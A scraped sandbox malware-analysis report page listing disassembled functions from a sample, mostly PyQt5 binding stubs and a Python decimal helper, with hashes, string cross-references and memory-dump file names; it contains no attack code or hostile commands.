Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ9$QTextBlockGroup$connectNotify$connectNotify(self, signal: QMetaMethod)
API String ID: 59943102-2754279344
Opcode ID: 55ca3378943b1e91ee544be62a1ead50072693ad300fbb2efa7970e670ede951
Instruction ID: f2e20cf9b57f26159e2b84f248e4593fc8990c60104a2b365f505abaa2494e5b
Opcode Fuzzy Hash: 55ca3378943b1e91ee544be62a1ead50072693ad300fbb2efa7970e670ede951
Instruction Fuzzy Hash: 5A210E32B0CB4686EA109F15F4642AAB7B4FB84BA4F540172DA8D43B74EF3CE845C740

Function 00007FFD862AA1F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD862AA28B

Strings

BJ8, xrefs: 00007FFD862AA240
childEvent, xrefs: 00007FFD862AA2C3
QTextObject, xrefs: 00007FFD862AA2CA
childEvent(self, a0: Optional[QChildEvent]), xrefs: 00007FFD862AA2B7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QTextObject$childEvent$childEvent(self, a0: Optional[QChildEvent])
API String ID: 59943102-2706670730
Opcode ID: ca2b66e87eb8097d5a14f65daa54b62efe3cdbcfb6e20e0103e258b291a9cd79
Instruction ID: 3fbe456d1ca2e15045fe6be350cc0d95ac76c00b2c44cf2e0789f88f32f85692
Opcode Fuzzy Hash: ca2b66e87eb8097d5a14f65daa54b62efe3cdbcfb6e20e0103e258b291a9cd79
Instruction Fuzzy Hash: E8213932B0CB4696EA108F15F4942AA73A4FF84BA1F140072EA8D03B24DF3DD858C700

Function 00007FFD86228E50 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD86228EEB

Strings

BJ9, xrefs: 00007FFD86228EA0
disconnectNotify(self, signal: QMetaMethod), xrefs: 00007FFD86228F17
disconnectNotify, xrefs: 00007FFD86228F23
QIntValidator, xrefs: 00007FFD86228F2A

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ9$QIntValidator$disconnectNotify$disconnectNotify(self, signal: QMetaMethod)
API String ID: 59943102-3272238586
Opcode ID: 86e3cbce7b80e2afc368e0c7668f0453308a0f4ab3e4debd2e3e9a1c60eb84a5
Instruction ID: a413a3fd213ad0718516a1a01d7058a4a084e2d56a7058366dc9f844a0c07c28
Opcode Fuzzy Hash: 86e3cbce7b80e2afc368e0c7668f0453308a0f4ab3e4debd2e3e9a1c60eb84a5
Instruction Fuzzy Hash: 5D21303270CB46C2EA409F15E8542AEB7A4FB94B94F580172DA8D47B74EF3CE849C740

Function 00007FFD862B2E30 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD862B2ECB

Strings

QTextList, xrefs: 00007FFD862B2F0A
customEvent, xrefs: 00007FFD862B2F03
BJ8, xrefs: 00007FFD862B2E80
customEvent(self, a0: Optional[QEvent]), xrefs: 00007FFD862B2EF7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QTextList$customEvent$customEvent(self, a0: Optional[QEvent])
API String ID: 59943102-116080897
Opcode ID: 91622e5c165216af64453ba639e915a2501142f5638c1fe8e36721dd2fe996c6
Instruction ID: 918810095e649a0eaa8e5431cf11b19fc48055a165d9471d924ba653dd5d64e7
Opcode Fuzzy Hash: 91622e5c165216af64453ba639e915a2501142f5638c1fe8e36721dd2fe996c6
Instruction Fuzzy Hash: AE21FD3170DB46C6EB409B25E8552BE77A5FB84BA4F540172DA8D43764EF3CE845C740

Function 00007FFD862A8220 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD862A82BB

Strings

customEvent, xrefs: 00007FFD862A82F3
customEvent(self, a0: Optional[QEvent]), xrefs: 00007FFD862A82E7
BJ8, xrefs: 00007FFD862A8270
QRegExpValidator, xrefs: 00007FFD862A82FA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QRegExpValidator$customEvent$customEvent(self, a0: Optional[QEvent])
API String ID: 59943102-2724355517
Opcode ID: e86dc4588f799906e0292329b901ef37c22393a543ca01f81d697a50a76d7ced
Instruction ID: 249c1db324515b4e6a1252e147d9a5af1c5185e8b2998f1ac9ed745d4a09c948
Opcode Fuzzy Hash: e86dc4588f799906e0292329b901ef37c22393a543ca01f81d697a50a76d7ced
Instruction Fuzzy Hash: 4121FC72B0CF4696EB409F55F8642AA77A4FB84BA5F140172DA8D47B64EF3CE849C700

Function 00007FFD86268E70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 54COMMON

Download Yara Rule

APIs

?setRects@QRegion@@QEAAXPEBVQRect@@H@Z.QT5GUI ref: 00007FFD86268EFA

Strings

setRects, xrefs: 00007FFD86268F4A
QRegion, xrefs: 00007FFD86268F51
setRects(self, a0: Iterable[QRect]), xrefs: 00007FFD86268F3E
BJ1, xrefs: 00007FFD86268E85

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setRect@@Rects@Region@@
String ID: BJ1$QRegion$setRects$setRects(self, a0: Iterable[QRect])
API String ID: 3651845976-2849456373
Opcode ID: ed4a94ffb79ff1722ff347e2f0d2c87f1315b05a30a5f40e948f473d72543f57
Instruction ID: 680e8ff1358b9833fd9cd239b6c4de5c283af9de02d6d5fac39b892fb5f1db2e
Opcode Fuzzy Hash: ed4a94ffb79ff1722ff347e2f0d2c87f1315b05a30a5f40e948f473d72543f57
Instruction Fuzzy Hash: 5C213576B18B46C1DB10DF59E8986AD33A4FB88BA4F914032CA5D43720EF39E845C740

Function 00007FFD8627CAA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?project@QVector3D@@QEBA?AV1@AEBVQMatrix4x4@@0AEBVQRect@@@Z.QT5GUI ref: 00007FFD8627CB44

Strings

project(self, modelView: QMatrix4x4, projection: QMatrix4x4, viewport: QRect) -> QVector3D, xrefs: 00007FFD8627CB73
project, xrefs: 00007FFD8627CB82
BJ9J9J9, xrefs: 00007FFD8627CAD1
QVector3D, xrefs: 00007FFD8627CB89

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?project@Matrix4x4@@0Rect@@@Vector3malloc
String ID: BJ9J9J9$QVector3D$project$project(self, modelView: QMatrix4x4, projection: QMatrix4x4, viewport: QRect) -> QVector3D
API String ID: 3839306919-2296468783
Opcode ID: e1a2c69603fee2b2cf4bb9430ccda05e4355d43a5c9e08043d8356d312055ca4
Instruction ID: 0c66e2a9d1b7f05d0e39710376a4dccf7afc6902d09263212b05015475425a69
Opcode Fuzzy Hash: e1a2c69603fee2b2cf4bb9430ccda05e4355d43a5c9e08043d8356d312055ca4
Instruction Fuzzy Hash: 89211376B08F4685EB40DF55E8A87AD33A8FB48BA0F914176CA9D43320DF39D849C740

Function 00007FFD875946CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON313 ref: 00007FFD875946F8
_PyUnicode_ToDecimalDigit.PYTHON313 ref: 00007FFD87594717
PyErr_SetString.PYTHON313 ref: 00007FFD87594737
PyLong_FromLong.PYTHON313 ref: 00007FFD87594751

Strings

not a decimal, xrefs: 00007FFD8759472D

Memory Dump Source

Source File: 0000000F.00000002.2691104187.00007FFD87591000.00000020.00000001.01000000.00000040.sdmp, Offset: 00007FFD87590000, based on PE: true

Associated: 0000000F.00000002.2691050427.00007FFD87590000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD87596000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD875DA000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD875E8000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691163302.00007FFD87637000.00000002.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691515219.00007FFD8763A000.00000004.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691572339.00007FFD8763C000.00000002.00000001.01000000.00000040.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd87590000_check.jbxd

Similarity

API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
String ID: not a decimal
API String ID: 3750391552-3590249192
Opcode ID: 98925aab420d500a80fb896ae28ec5313d1af364276c7e5354c7c80d82c75a3b
Instruction ID: ccf79e59974beaf40a19402fa2b4310162e2a64ed7deb9a4327ec012e53a3e28
Opcode Fuzzy Hash: 98925aab420d500a80fb896ae28ec5313d1af364276c7e5354c7c80d82c75a3b
Instruction Fuzzy Hash: 4F115125B9868681EF5A8B25F57433A22B1FF4AB84F0890B0CA1E47654DF2CEC46C740

Function 00007FFD8625AA90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON

Download Yara Rule

APIs

?setAlignment@QTextBlockFormat@@QEAAXV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5GUI ref: 00007FFD8625AB02

Strings

setAlignment(self, aalignment: Union[Qt.Alignment, Qt.AlignmentFlag]), xrefs: 00007FFD8625AB49
QTextTableFormat, xrefs: 00007FFD8625AB5C
setAlignment, xrefs: 00007FFD8625AB55
BJ1, xrefs: 00007FFD8625AAA5

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setAlignmentAlignment@BlockFlag@Flags@Format@@Qt@@@@@Text
String ID: BJ1$QTextTableFormat$setAlignment$setAlignment(self, aalignment: Union[Qt.Alignment, Qt.AlignmentFlag])
API String ID: 3958717661-1514019641
Opcode ID: 9dc3151bbe8b6b7c4f6eace72c293b50a713b865b38dbf455484d9c0023ccfe7
Instruction ID: 8ca46c5526d22315b50e4265e1b9b642036d9b92be092dcc40be595f51fc6901
Opcode Fuzzy Hash: 9dc3151bbe8b6b7c4f6eace72c293b50a713b865b38dbf455484d9c0023ccfe7
Instruction Fuzzy Hash: 45210476B08B46C5DB50DF15E8981AD33B8FB48BA0F954072CA9D43320EF39D999C740

Function 00007FFD86272CF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON

Download Yara Rule

APIs

?setAlignment@QTextBlockFormat@@QEAAXV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5GUI ref: 00007FFD86272D62

Strings

setAlignment(self, aalignment: Union[Qt.Alignment, Qt.AlignmentFlag]), xrefs: 00007FFD86272DA9
QTextBlockFormat, xrefs: 00007FFD86272DBC
setAlignment, xrefs: 00007FFD86272DB5
BJ1, xrefs: 00007FFD86272D05

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setAlignmentAlignment@BlockFlag@Flags@Format@@Qt@@@@@Text
String ID: BJ1$QTextBlockFormat$setAlignment$setAlignment(self, aalignment: Union[Qt.Alignment, Qt.AlignmentFlag])
API String ID: 3958717661-404316582
Opcode ID: 889bf1fccd2f360c6a9827b2704b5b97190122b6e94306d0a5c23fd9798fc53d
Instruction ID: 0b3835b253f6843f2b8b92f4995a093fd7b1bcfca4b17230c03b149d31c6bc67
Opcode Fuzzy Hash: 889bf1fccd2f360c6a9827b2704b5b97190122b6e94306d0a5c23fd9798fc53d
Instruction Fuzzy Hash: 2C210476B08B46C1DB50DF55E8996AD33B8FB48BA0F954132CA9D43320EF39D989C740

